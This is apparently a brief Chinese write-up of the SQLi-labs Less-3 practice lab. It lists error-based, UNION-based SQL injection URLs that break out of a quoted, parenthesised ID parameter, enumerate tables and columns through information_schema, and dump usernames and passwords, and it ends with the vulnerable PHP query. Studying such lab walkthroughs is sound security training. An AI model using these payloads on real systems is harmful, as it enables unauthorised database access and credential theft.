题目即为提示:
Get类型+基于错误的注入+单引号+括号+string
可大概猜测开发者所使用的代码是:
SELECT LOGIN_NAME,PASSWPRD,FROM TABLE WHERE ID = ('OUR INPUT HERE')
直接构造,不报错,去掉–+报错:
http://sqlilabs/Less-3/?id=-1')--+
接下来又是常规操作:
http://sqlilabs/Less-3/?id=1') order by 3--+
http://sqlilabs/Less-3/?id=1') order by 4--+
http://sqlilabs/Less-3/?id=-1') union select 1,2,3--+
http://sqlilabs/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
http://sqlilabs/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' and table_schema=database()--+
http://sqlilabs/Less-3/?id=-1') union select 1,2,(select group_concat(username,0x3a,password) from users) users--+
源代码中的 sql 语句为:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
:D